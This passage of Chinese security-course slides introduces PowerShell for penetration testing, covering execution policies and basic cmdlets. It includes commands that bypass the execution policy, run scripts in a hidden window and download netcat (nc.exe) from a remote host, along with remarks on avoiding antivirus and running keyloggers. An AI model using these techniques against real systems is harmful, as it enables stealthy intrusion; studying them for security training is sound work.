内容正文:
第十九课 PowerShell基础
Ssecurity incubation -
Base
The Best security Courses
2/35
• 了解powershell基础
• 掌握powershell的常用命令
• 掌握powershell的执行策略
• 了解后续工作中powershell的使用场景与集成攻击框架工具安装
学习目标
The Best security Courses
Powershell 是运行在windows机器上实现系统和应用程序管理自动
化的命令行脚本环境。你可以把它看成是命令行提示符cmd.exe的扩
充powershell具有以下特点
• 在window7以上版本的操作系统中是默认安装的脚本
• 可以在内存中运行,不需要写入磁盘
• 几乎不会触发杀毒软件
• 可以远程执行
• 目前很多工具都是基于powershell开发的
• 使windows脚本的执行变得更容易
• cmd.exe的运行通常会被阻止,但是powershell的运行通常不会被阻止
• 可用于管理活动目录
简介
The Best security Courses
Powershell使用
The Best security Courses
查看信息
The Best security Courses
1、.ps1文件一个powershell脚本其实就是一个简单的文本
文件,其扩展名为“.ps1”。powershell脚本文件包含一
系列powershell命令,每个命令显示为独立的一行。
2. 为了防止使用者运行恶意脚本。powershell提供了一个
执行策略。在默认情况下,这个执行策略被设置为“不能运
行”。如果powershell脚本无法运,可以使用
Get-ExecutionPolicy
命令查询当前的执行策略。
PowerShell的基本概念
The Best security Courses
Restricted:脚本不能运行(默认设置)
ReomteSigned:在本地创建的脚本可以运行,但从网上下载的脚本不能运行(拥有数
字签名的除外)
AllSigned:允许脚本由受信任的发布者签名时才能运行
Unrestricted:允许所有的脚本允许 可以使用下面的cmdlet命令设置powershell的执
行策略。
Set-ExecutionPolicy
PowerShell的基本概念
The Best security Courses
绕过本地权限并执行
输入
powershell.exe -ExecutionPolicy Bypass -File .\test.ps1
直接执行脚本,会提示系统中禁止执行脚本。
The Best security Courses
PowerShell.exe -ExecutionPolicy -NoLogo -
NonInteractive -NoProfile -WindowStyle
hidden -ExecutionPolicy Bypass -file xxx.ps1
2.本地隐藏绕过权限执行脚本
3.powershell 下载远程数据
powershell wget
"http://172.16.0.107:8000/nc.exe" -outfile
"nc.exe"
命令的参数说明:
ExecutionPolicy Bypass : 绕过执行安全策略,这
个参数非常重要,在渗透测试中,基本每一次运行
PowerShell脚本时都要使用这个参数。
WindowStyle Hidden : 隐藏窗口
NoLogo : 启动不显示版权标志的PowerShell
NonInteractive (-Nonl) : 非交互模式,
PowerShell不为用户提供交互的提示
NoProfile (-Nop): PowerShell控制台不加载当前
用户的配置文件
Noexit : 执行后不退出Shell。这在使用键盘记录等
脚本时非常重要。
The Best security Courses
在powershell中是不区分大小写的,命名规范采用的是“动词-名词”的形式,比如新建文件就是New-
Iterm test.txt,也可以在powershell中执行类似Linux的命令,比如ls、cat等,下面是一些基本的常用
命令:
New-Item 需要创建的目录 Type Directory #创建目录
New-Item 需要创建的文件 Type File #创建文件
Remove-Item 已存在目录 #删除目录
Get-Content 已存在文件 #查